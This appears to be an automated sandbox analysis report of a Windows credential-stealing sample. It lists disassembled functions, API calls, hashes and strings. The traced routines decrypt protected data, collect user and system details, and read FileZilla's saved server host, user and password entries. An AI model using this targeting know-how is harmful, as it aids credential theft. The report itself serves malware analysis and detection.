                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2068576380-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                                                                                        • Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00401177,044037A0,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                                        • GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1206570057-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                                                                                        • Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExitInfoProcessSystem
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 752954902-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                                                                                        • Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004070E0 Relevance: 81.6, APIs: 54, Instructions: 584stringmemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04407BF0), ref: 004072AB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004072BF
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004072D3
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004072E7
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406730), ref: 004072FB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406748), ref: 0040730F
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406688), ref: 00407322
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406760), ref: 00407336
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04407C78), ref: 0040734A
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 0040735E
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00407372
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00407386
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406730), ref: 00407399
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406748), ref: 004073AD
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406688), ref: 004073C1
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406760), ref: 004073D4
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04407CE0), ref: 004073E8
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004073FC
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00407410
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00407424
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406730), ref: 00407438
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406748), ref: 0040744B
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406688), ref: 0040745F
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406760), ref: 00407473
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04407D48), ref: 00407486
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 0040749A
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004074AE
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004074C2
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406730), ref: 004074D6
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406748), ref: 004074EA
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406688), ref: 004074FD
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406760), ref: 00407511
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04407DB0), ref: 00407525
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00407539
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 0040754D
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00407561
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406730), ref: 00407574
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406748), ref: 00407588
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406688), ref: 0040759C
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406760), ref: 004075AF
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04407E18), ref: 004075C3
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004075D7
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004075EB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004075FF
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406730), ref: 00407613
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406748), ref: 00407626
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406688), ref: 0040763A
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406760), ref: 0040764E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020,0041DEB8), ref: 00406FD6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020,00000000), ref: 00407018
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020, : ), ref: 0040702A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020,00000000), ref: 0040705F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020,0041DEC0), ref: 00407070
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020,00000000), ref: 004070A3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406FA0: lstrcat.KERNEL32(36B6C020,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,044036B0), ref: 004077DB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406A18), ref: 004077EE
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(36B6C020), ref: 004077FB
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(36B6C020), ref: 0040780B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3958002797-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 71a07dda988696830ba42ff86637ae7152b3adc93f1422aa4a5be7619d59b96e
                                                                                                                                                                                                                                                                                        • Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71a07dda988696830ba42ff86637ae7152b3adc93f1422aa4a5be7619d59b96e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363stringmemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 187 40ea90-40eb22 call 416d40 call 4154e0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416da0 call 4093a0 209 40eb27-40eb2c 187->209 210 40ef60-40ef73 call 416e00 call 413220 209->210 211 40eb32-40eb49 call 415530 209->211 211->210 216 40eb4f-40ebaf strtok_s call 416d40 * 4 GetProcessHeap HeapAlloc 211->216 227 40ebb2-40ebb6 216->227 228 40eeca-40ef5b lstrlen call 416da0 call 401500 call 404dc0 call 416e00 memset call 417040 * 4 call 416e00 * 4 227->228 229 40ebbc-40ebcd StrStrA 227->229 228->210 231 40ec06-40ec17 StrStrA 229->231 232 40ebcf-40ec01 lstrlen call 414fa0 call 416ea0 call 416e00 229->232 234 40ec50-40ec61 StrStrA 231->234 235 40ec19-40ec4b lstrlen call 414fa0 call 416ea0 call 416e00 231->235 232->231 239 40ec63-40ec95 lstrlen call 414fa0 call 416ea0 call 416e00 234->239 240 40ec9a-40ecab StrStrA 234->240 235->234 239->240 242 40ecb1-40ed03 lstrlen call 414fa0 call 416ea0 call 416e00 call 4170d0 call 4094a0 240->242 243 40ed39-40ed4b call 4170d0 lstrlen 240->243 242->243 288 40ed05-40ed34 call 416e20 call 416fb0 call 416ea0 call 416e00 242->288 261 40ed51-40ed63 call 4170d0 lstrlen 243->261 262 40eeaf-40eec5 strtok_s 243->262 261->262 274 40ed69-40ed7b call 4170d0 lstrlen 261->274 262->227 274->262 283 40ed81-40ed93 call 4170d0 lstrlen 274->283 283->262 293 40ed99-40eeaa lstrcat * 3 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 416e20 * 4 283->293 288->243 293->262
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040EBD3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040EC1D
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040EC67
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040ECB5
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,login: ), ref: 0040EE13
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040EE26
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,password: ), ref: 0040EE44
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040EE57
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
                                                                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 0040EEB9
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040EF17
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                                                                                                                                                        • API String ID: 1266801029-555421843
                                                                                                                                                                                                                                                                                        • Opcode ID: 1f8f732c21e2e1733e6ba11255d555f2543fe3c2becc4bb10e86d61f338088f8
                                                                                                                                                                                                                                                                                        • Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f8f732c21e2e1733e6ba11255d555f2543fe3c2becc4bb10e86d61f338088f8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 322 415ed0-415ee4 call 415dc0 325 416103-416162 LoadLibraryA * 5 322->325 326 415eea-4160fe call 415df0 GetProcAddress * 21 322->326 328 416164-416178 GetProcAddress 325->328 329 41617d-416184 325->329 326->325 328->329 331 4161b6-4161bd 329->331 332 416186-4161b1 GetProcAddress * 2 329->332 333 4161d8-4161df 331->333 334 4161bf-4161d3 GetProcAddress 331->334 332->331 335 4161e1-4161f4 GetProcAddress 333->335 336 4161f9-416200 333->336 334->333 335->336 337 416231-416232 336->337 338 416202-41622c GetProcAddress * 2 336->338 338->337
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043EAC98), ref: 00415F11
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043EACB0), ref: 00415F2A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,044033B8), ref: 00415F42
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403370), ref: 00415F5A
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,044032F8), ref: 00415F73
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04402B00), ref: 00415F8B
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7800), ref: 00415FA3
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7660), ref: 00415FBC
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403298), ref: 00415FD4
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403388), ref: 00415FEC
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,044031D8), ref: 00416005
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403358), ref: 0041601D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7920), ref: 00416035
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403430), ref: 0041604E
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403418), ref: 00416066
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E77C0), ref: 0041607E
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,044031A8), ref: 00416097
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403340), ref: 004160AF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E7980), ref: 004160C7
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,04403268), ref: 004160E0
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(75900000,043E79A0), ref: 004160F8
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(044032C8,?,004136C0), ref: 0041610A
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04403178,?,004136C0), ref: 0041611B
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(04403328,?,004136C0), ref: 0041612D
